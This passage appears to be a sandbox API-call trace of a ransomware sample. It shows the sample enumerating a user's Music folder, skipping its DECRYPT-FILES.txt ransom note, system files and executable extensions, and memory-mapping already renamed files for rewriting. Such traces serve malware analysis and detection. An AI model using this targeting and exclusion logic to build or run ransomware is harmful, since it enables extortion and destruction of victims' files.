HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0185.911] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.911] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0185.911] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\0a16c9.tmp" [0185.911] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.912] CloseHandle (hObject=0x0) returned 0 [0185.912] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.912] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f4dbf80, ftCreationTime.dwHighDateTime=0x1d4c534, ftLastAccessTime.dwLowDateTime=0xb19a4420, ftLastAccessTime.dwHighDateTime=0x1d4d4ea, ftLastWriteTime.dwLowDateTime=0xaf462b40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x16652, dwReserved0=0x0, dwReserved1=0x0, cFileName="cK A cQIxO.wav.62li", cAlternateFileName="CKACQI~1.62L")) returned 1 [0185.912] lstrcmpiW (lpString1="cK A cQIxO.wav.62li", lpString2="DECRYPT-FILES.txt") returned -1 [0185.912] lstrcmpiW (lpString1="cK A cQIxO.wav.62li", lpString2="autorun.inf") returned 1 [0185.912] lstrcmpiW (lpString1="cK A cQIxO.wav.62li", lpString2="boot.ini") returned 1 [0185.912] lstrcmpiW (lpString1="cK A cQIxO.wav.62li", lpString2="desktop.ini") returned -1 [0185.912] lstrcmpiW (lpString1="cK A cQIxO.wav.62li", lpString2="ntuser.dat") returned -1 [0185.912] lstrcmpiW (lpString1="cK A cQIxO.wav.62li", lpString2="iconcache.db") returned -1 [0185.912] lstrcmpiW (lpString1="cK A cQIxO.wav.62li", lpString2="bootsect.bak") returned 1 [0185.912] lstrcmpiW (lpString1="cK A cQIxO.wav.62li", lpString2="ntuser.dat.log") returned -1 [0185.912] lstrcmpiW (lpString1="cK A cQIxO.wav.62li", lpString2="thumbs.db") returned -1 [0185.912] lstrcmpiW (lpString1="cK A cQIxO.wav.62li", lpString2="Bootfont.bin") returned 1 [0185.912] lstrlenW (lpString="cK A cQIxO.wav.62li") returned 19 [0185.912] lstrcmpiW (lpString1="62li", lpString2="lnk") returned -1 [0185.912] lstrcmpiW (lpString1="62li", lpString2="exe") returned -1 [0185.912] lstrcmpiW (lpString1="62li", lpString2="sys") returned -1 [0185.912] lstrcmpiW (lpString1="62li", lpString2="dll") returned -1 [0185.912] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0185.912] lstrlenW (lpString="cK A cQIxO.wav.62li") returned 19 [0185.913] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0185.913] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="cK A cQIxO.wav.62li" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\cK A cQIxO.wav.62li") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\cK A cQIxO.wav.62li" [0185.913] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\cK A cQIxO.wav.62li" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\ck a cqixo.wav.62li"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.913] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=91730) returned 1 [0185.913] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.913] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.915] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.915] CloseHandle (hObject=0x270) returned 1 [0185.916] CloseHandle (hObject=0x26c) returned 1 [0185.916] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.916] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa2a510, ftCreationTime.dwHighDateTime=0x1d4c8f2, ftLastAccessTime.dwLowDateTime=0xf7f685d0, ftLastAccessTime.dwHighDateTime=0x1d4d159, ftLastWriteTime.dwLowDateTime=0xaf488ca0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xb2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="clV-4ix.mp3.o10v", cAlternateFileName="CLV-4I~1.O10")) returned 1 [0185.916] lstrcmpiW (lpString1="clV-4ix.mp3.o10v", lpString2="DECRYPT-FILES.txt") returned -1 [0185.916] lstrcmpiW (lpString1="clV-4ix.mp3.o10v", lpString2="autorun.inf") returned 1 [0185.916] lstrcmpiW (lpString1="clV-4ix.mp3.o10v", lpString2="boot.ini") returned 1 [0185.916] lstrcmpiW (lpString1="clV-4ix.mp3.o10v", lpString2="desktop.ini") returned -1 [0185.916] lstrcmpiW (lpString1="clV-4ix.mp3.o10v", lpString2="ntuser.dat") returned -1 [0185.916] lstrcmpiW (lpString1="clV-4ix.mp3.o10v", lpString2="iconcache.db") returned -1 [0185.916] lstrcmpiW (lpString1="clV-4ix.mp3.o10v", lpString2="bootsect.bak") returned 1 [0185.916] lstrcmpiW (lpString1="clV-4ix.mp3.o10v", lpString2="ntuser.dat.log") returned -1 [0185.916] lstrcmpiW (lpString1="clV-4ix.mp3.o10v", lpString2="thumbs.db") returned -1 [0185.916] lstrcmpiW (lpString1="clV-4ix.mp3.o10v", lpString2="Bootfont.bin") returned 1 [0185.916] lstrlenW (lpString="clV-4ix.mp3.o10v") returned 16 [0185.916] lstrcmpiW (lpString1="o10v", lpString2="lnk") returned 1 [0185.916] lstrcmpiW (lpString1="o10v", lpString2="exe") returned 1 [0185.916] lstrcmpiW (lpString1="o10v", lpString2="sys") returned -1 [0185.916] lstrcmpiW (lpString1="o10v", lpString2="dll") returned 1 [0185.916] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0185.916] lstrlenW (lpString="clV-4ix.mp3.o10v") returned 16 [0185.916] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0185.916] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="clV-4ix.mp3.o10v" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\clV-4ix.mp3.o10v") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\clV-4ix.mp3.o10v" [0185.916] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\clV-4ix.mp3.o10v" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\clv-4ix.mp3.o10v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.917] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=2860) returned 1 [0185.917] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.917] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.918] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.918] CloseHandle (hObject=0x270) returned 1 [0185.918] CloseHandle (hObject=0x26c) returned 1 [0185.918] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.918] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf43c9e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf43c9e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf43c9e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.918] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.918] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10b488b0, ftCreationTime.dwHighDateTime=0x1d4cf2a, ftLastAccessTime.dwLowDateTime=0x4be9d990, ftLastAccessTime.dwHighDateTime=0x1d4c9d9, ftLastWriteTime.dwLowDateTime=0xaf4aee00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xcc72, dwReserved0=0x0, dwReserved1=0x0, cFileName="dEyib6wB.mp3.9syh0", cAlternateFileName="DEYIB6~1.9SY")) returned 1 [0185.918] lstrcmpiW (lpString1="dEyib6wB.mp3.9syh0", lpString2="DECRYPT-FILES.txt") returned 1 [0185.918] lstrcmpiW (lpString1="dEyib6wB.mp3.9syh0", lpString2="autorun.inf") returned 1 [0185.918] lstrcmpiW (lpString1="dEyib6wB.mp3.9syh0", lpString2="boot.ini") returned 1 [0185.918] lstrcmpiW (lpString1="dEyib6wB.mp3.9syh0", lpString2="desktop.ini") returned 1 [0185.918] lstrcmpiW (lpString1="dEyib6wB.mp3.9syh0", lpString2="ntuser.dat") returned -1 [0185.918] lstrcmpiW (lpString1="dEyib6wB.mp3.9syh0", lpString2="iconcache.db") returned -1 [0185.918] lstrcmpiW (lpString1="dEyib6wB.mp3.9syh0", lpString2="bootsect.bak") returned 1 [0185.918] lstrcmpiW (lpString1="dEyib6wB.mp3.9syh0", lpString2="ntuser.dat.log") returned -1 [0185.918] lstrcmpiW (lpString1="dEyib6wB.mp3.9syh0", lpString2="thumbs.db") returned -1 [0185.918] lstrcmpiW (lpString1="dEyib6wB.mp3.9syh0", lpString2="Bootfont.bin") returned 1 [0185.918] lstrlenW (lpString="dEyib6wB.mp3.9syh0") returned 18 [0185.918] lstrcmpiW (lpString1="9syh0", lpString2="lnk") returned -1 [0185.919] lstrcmpiW (lpString1="9syh0", lpString2="exe") returned -1 [0185.919] lstrcmpiW (lpString1="9syh0", lpString2="sys") returned -1 [0185.919] lstrcmpiW (lpString1="9syh0", lpString2="dll") returned -1 [0185.919] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0185.919] lstrlenW (lpString="dEyib6wB.mp3.9syh0") returned 18 [0185.919] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0185.919] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="dEyib6wB.mp3.9syh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\dEyib6wB.mp3.9syh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\dEyib6wB.mp3.9syh0" [0185.919] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.919] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\dEyib6wB.mp3.9syh0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\deyib6wb.mp3.9syh0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.919] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=52338) returned 1 [0185.919] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.919] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.920] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.920] CloseHandle (hObject=0x270) returned 1 [0185.920] CloseHandle (hObject=0x26c) returned 1 [0185.920] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.920] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd312e670, ftCreationTime.dwHighDateTime=0x1d4c7bb, ftLastAccessTime.dwLowDateTime=0xea14aba0, ftLastAccessTime.dwHighDateTime=0x1d4cf55, ftLastWriteTime.dwLowDateTime=0xaf4fb0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xdb2d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i8_B4K3DPMoDG.m4a.wq2bl3", cAlternateFileName="I8_B4K~1.WQ2")) returned 1 [0185.920] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a.wq2bl3", lpString2="DECRYPT-FILES.txt") returned 1 [0185.920] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a.wq2bl3", lpString2="autorun.inf") returned 1 [0185.920] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a.wq2bl3", lpString2="boot.ini") returned 1 [0185.920] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a.wq2bl3", lpString2="desktop.ini") returned 1 [0185.921] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a.wq2bl3", lpString2="ntuser.dat") returned -1 [0185.921] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a.wq2bl3", lpString2="iconcache.db") returned -1 [0185.921] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a.wq2bl3", lpString2="bootsect.bak") returned 1 [0185.921] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a.wq2bl3", lpString2="ntuser.dat.log") returned -1 [0185.921] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a.wq2bl3", lpString2="thumbs.db") returned -1 [0185.921] lstrcmpiW (lpString1="i8_B4K3DPMoDG.m4a.wq2bl3", lpString2="Bootfont.bin") returned 1 [0185.921] lstrlenW (lpString="i8_B4K3DPMoDG.m4a.wq2bl3") returned 24 [0185.921] lstrcmpiW (lpString1="wq2bl3", lpString2="lnk") returned 1 [0185.921] lstrcmpiW (lpString1="wq2bl3", lpString2="exe") returned 1 [0185.921] lstrcmpiW (lpString1="wq2bl3", lpString2="sys") returned 1 [0185.921] lstrcmpiW (lpString1="wq2bl3", lpString2="dll") returned 1 [0185.921] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0185.921] lstrlenW (lpString="i8_B4K3DPMoDG.m4a.wq2bl3") returned 24 [0185.921] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0185.921] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="i8_B4K3DPMoDG.m4a.wq2bl3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\i8_B4K3DPMoDG.m4a.wq2bl3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\i8_B4K3DPMoDG.m4a.wq2bl3" [0185.921] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\i8_B4K3DPMoDG.m4a.wq2bl3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\i8_b4k3dpmodg.m4a.wq2bl3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.921] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=56109) returned 1 [0185.921] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.922] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.922] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.922] CloseHandle (hObject=0x270) returned 1 [0185.922] CloseHandle (hObject=0x26c) returned 1 [0185.922] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.923] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe5656b0, ftCreationTime.dwHighDateTime=0x1d4cd3c, ftLastAccessTime.dwLowDateTime=0x78dcd7a0, ftLastAccessTime.dwHighDateTime=0x1d4ce33, ftLastWriteTime.dwLowDateTime=0xaf521220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xc059, dwReserved0=0x0, dwReserved1=0x0, cFileName="MculZic-sh 2UCGOPTG.mp3.KRODor", cAlternateFileName="MCULZI~1.KRO")) returned 1 [0185.923] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3.KRODor", lpString2="DECRYPT-FILES.txt") returned 1 [0185.923] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3.KRODor", lpString2="autorun.inf") returned 1 [0185.923] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3.KRODor", lpString2="boot.ini") returned 1 [0185.923] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3.KRODor", lpString2="desktop.ini") returned 1 [0185.923] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3.KRODor", lpString2="ntuser.dat") returned -1 [0185.923] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3.KRODor", lpString2="iconcache.db") returned 1 [0185.923] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3.KRODor", lpString2="bootsect.bak") returned 1 [0185.923] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3.KRODor", lpString2="ntuser.dat.log") returned -1 [0185.923] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3.KRODor", lpString2="thumbs.db") returned -1 [0185.923] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3.KRODor", lpString2="Bootfont.bin") returned 1 [0185.923] lstrlenW (lpString="MculZic-sh 2UCGOPTG.mp3.KRODor") returned 30 [0185.923] lstrcmpiW (lpString1="KRODor", lpString2="lnk") returned -1 [0185.923] lstrcmpiW (lpString1="KRODor", lpString2="exe") returned 1 [0185.923] lstrcmpiW (lpString1="KRODor", lpString2="sys") returned -1 [0185.923] lstrcmpiW (lpString1="KRODor", lpString2="dll") returned 1 [0185.923] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0185.923] lstrlenW (lpString="MculZic-sh 2UCGOPTG.mp3.KRODor") returned 30 [0185.923] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0185.923] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="MculZic-sh 2UCGOPTG.mp3.KRODor" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\MculZic-sh 2UCGOPTG.mp3.KRODor") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\MculZic-sh 2UCGOPTG.mp3.KRODor" [0185.923] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.923] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\MculZic-sh 2UCGOPTG.mp3.KRODor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\mculzic-sh 2ucgoptg.mp3.krodor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.924] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=49241) returned 1 [0185.924] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.924] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.925] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.925] CloseHandle (hObject=0x270) returned 1 [0185.925] CloseHandle (hObject=0x26c) returned 1 [0185.925] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.925] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5ee5830, ftCreationTime.dwHighDateTime=0x1d4d366, ftLastAccessTime.dwLowDateTime=0x4fac95d0, ftLastAccessTime.dwHighDateTime=0x1d4ceda, ftLastWriteTime.dwLowDateTime=0xaf547380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x12619, dwReserved0=0x0, dwReserved1=0x0, cFileName="qD8wKNVWw-K1Oehbsb.m4a.XV2X", cAlternateFileName="QD8WKN~1.XV2")) returned 1 [0185.925] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a.XV2X", lpString2="DECRYPT-FILES.txt") returned 1 [0185.925] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a.XV2X", lpString2="autorun.inf") returned 1 [0185.925] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a.XV2X", lpString2="boot.ini") returned 1 [0185.925] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a.XV2X", lpString2="desktop.ini") returned 1 [0185.925] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a.XV2X", lpString2="ntuser.dat") returned 1 [0185.925] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a.XV2X", lpString2="iconcache.db") returned 1 [0185.925] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a.XV2X", lpString2="bootsect.bak") returned 1 [0185.925] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a.XV2X", lpString2="ntuser.dat.log") returned 1 [0185.925] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a.XV2X", lpString2="thumbs.db") returned -1 [0185.925] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a.XV2X", lpString2="Bootfont.bin") returned 1 [0185.925] lstrlenW (lpString="qD8wKNVWw-K1Oehbsb.m4a.XV2X") returned 27 [0185.925] lstrcmpiW (lpString1="XV2X", lpString2="lnk") returned 1 [0185.925] lstrcmpiW (lpString1="XV2X", lpString2="exe") returned 1 [0185.925] lstrcmpiW (lpString1="XV2X", lpString2="sys") returned 1 [0185.925] lstrcmpiW (lpString1="XV2X", lpString2="dll") returned 1 [0185.925] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0185.925] lstrlenW (lpString="qD8wKNVWw-K1Oehbsb.m4a.XV2X") returned 27 [0185.925] lstrcpyW (in: lpString1=0x36fe7e0, 